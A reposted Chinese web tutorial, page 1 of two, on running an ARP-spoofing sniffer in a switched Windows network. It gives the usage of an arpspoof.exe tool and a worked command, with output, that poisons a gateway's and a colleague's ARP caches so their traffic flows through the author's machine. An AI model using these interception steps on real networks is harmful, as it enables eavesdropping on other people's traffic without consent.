| 网站首页 | 学科竞赛 | 商城 | 论文与总结 | 论坛 | 教师家园 | 帮助中心 | 软件及教程 | 快速通道
充值说明--淘宝购买--商城购买--银行邮政汇款--充值卡充值 全站上传】【获取点券】【精品标准】【课件大赛
您现在的位置: 新课标教学网 >> 电脑技巧 >> 操作系统 >> 正文
Windows交换环境中ARP Sniffer的实现
作者:佚名    文章来源:网络    点击数:    更新时间:2010-1-20

  根据交换环境中Sniffer实现的原理(详见交换环境下Sniffer的实现),我写了一个类似于Linux环境下的ArpSpoof实现在Windows环境下的Arp Sniffer。

  在交换环境下Windows中实现Sniffer需要具备的条件:

  1、安装Winpcap驱动。

  2、我写了一个类似于Linux环境下的ArpSpoof(我只在Windows 2000 Server下测试过,其他期待您的测试)。

  3、一个Sniffer,如NetXray或者NAI Sniffer Pro(推荐)。

  具体的实现方法:

  使用ArpSpoof实现基于ARP的欺骗:

  C:\>arpspoof.exe

  ARPSpoof, by netXeyes, Special Thanks BB

  www.netXeyes.com 2002, dansnow@21cn.com

  Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]

  其中Spoof IP1和Spoof IP2是想要进行欺骗和嗅探的IP地址,Own IP是自己的IP地址(注意这三个IP必须是在同一个局域网内没有跨越交换机或者路由器)。

  例如目前公司的局域网环境为192.168.0.xxx,子网掩码为255.255.255.0,网关为192.168.0.1。我们的IP为192.168.0.29,想要Sniffer 192.168.0.2的数据包。

  由于网关为192.168.0.1,所以我们就只要欺骗192.168.0.1和192.168.0.2就可以了。也就是说告诉192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告诉192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。这样以来所有的数据包都会发到192.168.0.29,并且由192.168.0.29实现转发(windows 2000默认可以进行包转发,至于Windows 9.x和Windows NT/XP我没有测试过,希望您可以告诉我)。

  C:\>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29

  ARPSpoof, by netXeyes, Special Thanks BB

  www.netXeyes.com 2002, dansnow@21cn.com

  Begin Spoof.........

  Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29

  Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29

[1] [2] 下一页

发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
推荐文章
  • 此栏目下没有推荐文章
  • 热门文章
    正版Win7购买升级攻略
    轻松打造Windows 7一键还原系统 IE8优化小技巧
    Windows 7新功能:库(Library)
    70个功能和技巧彻底搞定Win 7
    七大超实用方法 轻松提高Windows7性能
    相关文章
    没有相关文章
    - 充值说明- 网站地图 - 友情链接 - 联系我们 - 版权申明 - 管理登陆 -

    Copyright @2005-2009 新课标教学网 浙ICP备05071497号
    疑问、充值QQ:77278335点击这里给我发消息 淘宝旺旺:sao1010点击这里给我发消息 Email:feng1011@gmail.com 电话:15867706660 新课标教学网交流群:30272233 技术支持:站长之家